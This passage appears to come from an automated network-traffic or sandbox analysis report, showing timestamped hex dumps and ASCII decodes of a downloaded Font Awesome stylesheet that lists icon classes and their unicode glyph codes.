73
                                                                          Data Ascii: tate-90,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-flip-horizontal,:root .fa-flip-vertical,:root .fa-flip-both { -webkit-filter: none; filter: none; }.fa-stack { display: inline-block; height: 2em; line-height: 2em; pos
                                                                          2023-11-21 16:58:40 UTC144INData Raw: 0a 0a 2e 66 61 2d 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 39 22 3b 20 7d 0a 0a 2e 66 61 2d 61 6c 69 67 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 36 22 3b 20 7d 0a 0a 2e 66 61 2d 61 6c 69 67 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 38 22 3b 20 7d 0a 0a 2e 66 61 2d 61 6c 69 70 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 34 32 22 3b 20 7d 0a 0a 2e 66 61 2d 61 6c 6c 65 72 67 69 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 36 31 22 3b 20 7d 0a 0a 2e 66 61 2d 61 6d 61 7a 6f 6e 3a 62 65 66 6f 72 65 20 7b
                                                                          Data Ascii: .fa-align-justify:before { content: "\f039"; }.fa-align-left:before { content: "\f036"; }.fa-align-right:before { content: "\f038"; }.fa-alipay:before { content: "\f642"; }.fa-allergies:before { content: "\f461"; }.fa-amazon:before {
                                                                          2023-11-21 16:58:40 UTC145INData Raw: 66 31 37 39 22 3b 20 7d 0a 0a 2e 66 61 2d 61 70 70 6c 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 64 31 22 3b 20 7d 0a 0a 2e 66 61 2d 61 70 70 6c 65 2d 70 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 31 35 22 3b 20 7d 0a 0a 2e 66 61 2d 61 72 63 68 69 76 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 37 22 3b 20 7d 0a 0a 2e 66 61 2d 61 72 63 68 77 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 35 37 22 3b 20 7d 0a 0a 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 35 38 22 3b 20 7d 0a 0a 2e 66 61 2d 61 72 72
                                                                          Data Ascii: f179"; }.fa-apple-alt:before { content: "\f5d1"; }.fa-apple-pay:before { content: "\f415"; }.fa-archive:before { content: "\f187"; }.fa-archway:before { content: "\f557"; }.fa-arrow-alt-circle-down:before { content: "\f358"; }.fa-arr
                                                                          2023-11-21 16:58:40 UTC146INData Raw: 3a 20 22 5c 66 33 37 33 22 3b 20 7d 0a 0a 2e 66 61 2d 61 75 64 69 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 65 22 3b 20 7d 0a 0a 2e 66 61 2d 61 75 74 6f 70 72 65 66 69 78 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 31 63 22 3b 20 7d 0a 0a 2e 66 61 2d 61 76 69 61 6e 65 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 37 34 22 3b 20 7d 0a 0a 2e 66 61 2d 61 76 69 61 74 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 32 31 22 3b 20 7d 0a 0a 2e 66 61 2d 61 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 35 39 22 3b 20 7d 0a 0a 2e 66 61 2d 61 77 73 3a 62
                                                                          Data Ascii: : "\f373"; }.fa-audio-description:before { content: "\f29e"; }.fa-autoprefixer:before { content: "\f41c"; }.fa-avianex:before { content: "\f374"; }.fa-aviato:before { content: "\f421"; }.fa-award:before { content: "\f559"; }.fa-aws:b
                                                                          2023-11-21 16:58:40 UTC148INData Raw: 74 65 72 79 2d 74 68 72 65 65 2d 71 75 61 72 74 65 72 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 34 31 22 3b 20 7d 0a 0a 2e 66 61 2d 62 61 74 74 6c 65 2d 6e 65 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 33 35 22 3b 20 7d 0a 0a 2e 66 61 2d 62 65 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 33 36 22 3b 20 7d 0a 0a 2e 66 61 2d 62 65 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 66 63 22 3b 20 7d 0a 0a 2e 66 61 2d 62 65 68 61 6e 63 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 62 34 22 3b 20 7d 0a 0a 2e 66 61 2d 62 65 68 61 6e 63 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63
                                                                          Data Ascii: tery-three-quarters:before { content: "\f241"; }.fa-battle-net:before { content: "\f835"; }.fa-bed:before { content: "\f236"; }.fa-beer:before { content: "\f0fc"; }.fa-behance:before { content: "\f1b4"; }.fa-behance-square:before { c
                                                                          2023-11-21 16:58:40 UTC149INData Raw: 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 65 37 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6d 62 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 32 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6e 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 64 37 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6e 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 35 63 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 64 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6f 6b 2d 64 65 61 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 62 37 22 3b 20 7d 0a 0a 2e 66 61 2d 62 6f 6f 6b 2d 6d 65 64 69 63 61 6c 3a
                                                                          Data Ascii: re { content: "\f0e7"; }.fa-bomb:before { content: "\f1e2"; }.fa-bone:before { content: "\f5d7"; }.fa-bong:before { content: "\f55c"; }.fa-book:before { content: "\f02d"; }.fa-book-dead:before { content: "\f6b7"; }.fa-book-medical:
                                                                          2023-11-21 16:58:40 UTC151INData Raw: 61 64 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 6c 6c 68 6f 72 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 31 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 6c 6c 73 65 79 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 30 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 72 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 36 61 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 72 6f 6d 6f 62 65 6c 65 78 70 65 72 74 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 37 66 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 30 37 22 3b 20 7d 0a 0a 2e 66 61 2d 62 75 73 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20
                                                                          Data Ascii: ad"; }.fa-bullhorn:before { content: "\f0a1"; }.fa-bullseye:before { content: "\f140"; }.fa-burn:before { content: "\f46a"; }.fa-buromobelexperte:before { content: "\f37f"; }.fa-bus:before { content: "\f207"; }.fa-bus-alt:before {
                                                                          2023-11-21 16:58:40 UTC152INData Raw: 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 2d 73 69 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 65 34 22 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 61 76 61 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 66 66 22 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 37 22 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 65 74 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 39 22 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 61 22 3b 20 7d 0a 0a 2e 66 61 2d 63 61 72 65 74 2d 73 71 75 61 72 65 2d 64 6f
                                                                          Data Ascii: ; }.fa-car-side:before { content: "\f5e4"; }.fa-caravan:before { content: "\f8ff"; }.fa-caret-down:before { content: "\f0d7"; }.fa-caret-left:before { content: "\f0d9"; }.fa-caret-right:before { content: "\f0da"; }.fa-caret-square-do
                                                                          2023-11-21 16:58:40 UTC153INData Raw: 36 63 30 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 31 62 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 2d 74 65 61 63 68 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 31 63 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 61 72 67 69 6e 67 2d 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 65 37 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 61 72 74 2d 61 72 65 61 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 66 65 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 61 72 74 2d 62 61 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 30 22 3b 20 7d
                                                                          Data Ascii: 6c0"; }.fa-chalkboard:before { content: "\f51b"; }.fa-chalkboard-teacher:before { content: "\f51c"; }.fa-charging-station:before { content: "\f5e7"; }.fa-chart-area:before { content: "\f1fe"; }.fa-chart-bar:before { content: "\f080"; }
                                                                          2023-11-21 16:58:40 UTC155INData Raw: 37 37 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 69 6c 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 65 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 72 6f 6d 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 36 38 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 72 6f 6d 65 63 61 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 33 38 22 3b 20 7d 0a 0a 2e 66 61 2d 63 68 75 72 63 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 31 64 22 3b 20 7d 0a 0a 2e 66 61 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 31 22 3b 20 7d 0a 0a 2e 66 61 2d 63 69 72 63 6c 65 2d 6e 6f 74 63 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63
                                                                          Data Ascii: 77"; }.fa-child:before { content: "\f1ae"; }.fa-chrome:before { content: "\f268"; }.fa-chromecast:before { content: "\f838"; }.fa-church:before { content: "\f51d"; }.fa-circle:before { content: "\f111"; }.fa-circle-notch:before { c
                                                                          2023-11-21 16:58:40 UTC156INData Raw: 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 36 31 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 31 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 64 65 2d 62 72 61 6e 63 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 36 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 64 65 70 65 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 62 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 64 69 65 70 69 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 38 34 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 66 66 65 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 66 34 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 67 3a 62 65 66 6f 72 65
                                                                          Data Ascii: ontent: "\f561"; }.fa-code:before { content: "\f121"; }.fa-code-branch:before { content: "\f126"; }.fa-codepen:before { content: "\f1cb"; }.fa-codiepie:before { content: "\f284"; }.fa-coffee:before { content: "\f0f4"; }.fa-cog:before
                                                                          2023-11-21 16:58:40 UTC157INData Raw: 2d 63 6f 70 79 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 66 39 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 74 74 6f 6e 2d 62 75 72 65 61 75 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 39 65 22 3b 20 7d 0a 0a 2e 66 61 2d 63 6f 75 63 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 62 38 22 3b 20 7d 0a 0a 2e 66 61 2d 63 70 61 6e 65 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 38 38 22 3b 20 7d 0a 0a 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 65 22 3b 20 7d 0a 0a 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 62 79 3a
                                                                          Data Ascii: -copyright:before { content: "\f1f9"; }.fa-cotton-bureau:before { content: "\f89e"; }.fa-couch:before { content: "\f4b8"; }.fa-cpanel:before { content: "\f388"; }.fa-creative-commons:before { content: "\f25e"; }.fa-creative-commons-by:
                                                                          2023-11-21 16:58:40 UTC159INData Raw: 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 66 37 22 3b 20 7d 0a 0a 2e 66 61 2d 63 73 73 33 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 63 22 3b 20 7d 0a 0a 2e 66 61 2d 63 73 73 33 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 38 62 22 3b 20 7d 0a 0a 2e 66 61 2d 63 75 62 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 62 32 22 3b 20 7d 0a 0a 2e 66 61 2d 63 75 62 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 62 33 22 3b 20 7d 0a 0a 2e 66 61 2d 63 75 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 63 34 22 3b 20 7d 0a 0a 2e 66 61 2d 63 75 74 74 6c 65 66 69 73 68 3a 62 65 66 6f 72 65 20
                                                                          Data Ascii: content: "\f7f7"; }.fa-css3:before { content: "\f13c"; }.fa-css3-alt:before { content: "\f38b"; }.fa-cube:before { content: "\f1b2"; }.fa-cubes:before { content: "\f1b3"; }.fa-cut:before { content: "\f0c4"; }.fa-cuttlefish:before
                                                                          2023-11-21 16:58:40 UTC160INData Raw: 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 32 36 22 3b 20 7d 0a 0a 2e 66 61 2d 64 69 63 65 2d 74 68 72 65 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 32 37 22 3b 20 7d 0a 0a 2e 66 61 2d 64 69 63 65 2d 74 77 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 32 38 22 3b 20 7d 0a 0a 2e 66 61 2d 64 69 67 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 36 22 3b 20 7d 0a 0a 2e 66 61 2d 64 69 67 69 74 61 6c 2d 6f 63 65 61 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 39 31 22 3b 20 7d 0a 0a 2e 66 61 2d 64 69 67 69 74 61 6c 2d 74 61 63 68 6f 67 72 61 70 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e
                                                                          Data Ascii: before { content: "\f526"; }.fa-dice-three:before { content: "\f527"; }.fa-dice-two:before { content: "\f528"; }.fa-digg:before { content: "\f1a6"; }.fa-digital-ocean:before { content: "\f391"; }.fa-digital-tachograph:before { conten
                                                                          2023-11-21 16:58:40 UTC161INData Raw: 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 39 37 22 3b 20 7d 0a 0a 2e 66 61 2d 64 72 6f 70 62 6f 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 62 22 3b 20 7d 0a 0a 2e 66 61 2d 64 72 75 6d 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 36 39 22 3b 20 7d 0a 0a 2e 66 61 2d 64 72 75 6d 2d 73 74 65 65 6c 70 61 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 36 61 22 3b 20 7d 0a 0a 2e 66 61 2d 64 72 75 6d 73 74 69 63 6b 2d 62 69 74 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 64 37 22 3b 20 7d 0a 0a 2e 66 61 2d 64 72 75 70 61 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66
                                                                          Data Ascii: re:before { content: "\f397"; }.fa-dropbox:before { content: "\f16b"; }.fa-drum:before { content: "\f569"; }.fa-drum-steelpan:before { content: "\f56a"; }.fa-drumstick-bite:before { content: "\f6d7"; }.fa-drupal:before { content: "\f
                                                                          2023-11-21 16:58:40 UTC163INData Raw: 6e 74 65 6e 74 3a 20 22 5c 66 31 32 64 22 3b 20 7d 0a 0a 2e 66 61 2d 65 72 6c 61 6e 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 39 64 22 3b 20 7d 0a 0a 2e 66 61 2d 65 74 68 65 72 65 75 6d 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 32 65 22 3b 20 7d 0a 0a 2e 66 61 2d 65 74 68 65 72 6e 65 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 39 36 22 3b 20 7d 0a 0a 2e 66 61 2d 65 74 73 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 64 37 22 3b 20 7d 0a 0a 2e 66 61 2d 65 75 72 6f 2d 73 69 67 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 33 22 3b 20 7d 0a 0a 2e 66 61 2d 65 76 65 72 6e 6f 74 65 3a 62 65 66
                                                                          Data Ascii: ntent: "\f12d"; }.fa-erlang:before { content: "\f39d"; }.fa-ethereum:before { content: "\f42e"; }.fa-ethernet:before { content: "\f796"; }.fa-etsy:before { content: "\f2d7"; }.fa-euro-sign:before { content: "\f153"; }.fa-evernote:bef
                                                                          2023-11-21 16:58:40 UTC164INData Raw: 20 7d 0a 0a 2e 66 61 2d 66 61 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 63 22 3b 20 7d 0a 0a 2e 66 61 2d 66 65 61 74 68 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 32 64 22 3b 20 7d 0a 0a 2e 66 61 2d 66 65 61 74 68 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 36 62 22 3b 20 7d 0a 0a 2e 66 61 2d 66 65 64 65 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 39 37 22 3b 20 7d 0a 0a 2e 66 61 2d 66 65 64 6f 72 61 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 39 38 22 3b 20 7d 0a 0a 2e 66 61 2d 66 65 6d 61 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66
                                                                          Data Ascii: }.fa-fax:before { content: "\f1ac"; }.fa-feather:before { content: "\f52d"; }.fa-feather-alt:before { content: "\f56b"; }.fa-fedex:before { content: "\f797"; }.fa-fedora:before { content: "\f798"; }.fa-female:before { content: "\f
                                                                          2023-11-21 16:58:40 UTC165INData Raw: 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 65 2d 76 69 64 65 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 38 22 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 65 2d 77 6f 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 32 22 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 37 35 22 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 6c 2d 64 72 69 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 37 36 22 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 6d 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 38 22 3b 20 7d 0a 0a 2e 66 61 2d 66 69 6c 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74
                                                                          Data Ascii: ; }.fa-file-video:before { content: "\f1c8"; }.fa-file-word:before { content: "\f1c2"; }.fa-fill:before { content: "\f575"; }.fa-fill-drip:before { content: "\f576"; }.fa-film:before { content: "\f008"; }.fa-filter:before { content
                                                                          2023-11-21 16:58:40 UTC167INData Raw: 22 3b 20 7d 0a 0a 2e 66 61 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 31 22 3b 20 7d 0a 0a 2e 66 61 2d 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 34 22 3b 20 7d 0a 0a 2e 66 61 2d 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 35 63 22 3b 20 7d 0a 0a 2e 66 61 2d 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 66 6c 61 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 32 35 22 3b 20 7d 0a 0a 2e 66 61 2d 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 6c 6f 67 6f 2d 66 75 6c 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 65
                                                                          Data Ascii: "; }.fa-font:before { content: "\f031"; }.fa-font-awesome:before { content: "\f2b4"; }.fa-font-awesome-alt:before { content: "\f35c"; }.fa-font-awesome-flag:before { content: "\f425"; }.fa-font-awesome-logo-full:before { content: "\f4e
                                                                          2023-11-21 16:58:40 UTC168INData Raw: 32 36 35 22 3b 20 7d 0a 0a 2e 66 61 2d 67 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 36 30 22 3b 20 7d 0a 0a 2e 66 61 2d 67 67 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 36 31 22 3b 20 7d 0a 0a 2e 66 61 2d 67 68 6f 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 65 32 22 3b 20 7d 0a 0a 2e 66 61 2d 67 69 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 62 22 3b 20 7d 0a 0a 2e 66 61 2d 67 69 66 74 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 39 63 22 3b 20 7d 0a 0a 2e 66 61 2d 67 69 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 33 22 3b
                                                                          Data Ascii: 265"; }.fa-gg:before { content: "\f260"; }.fa-gg-circle:before { content: "\f261"; }.fa-ghost:before { content: "\f6e2"; }.fa-gift:before { content: "\f06b"; }.fa-gifts:before { content: "\f79c"; }.fa-git:before { content: "\f1d3";
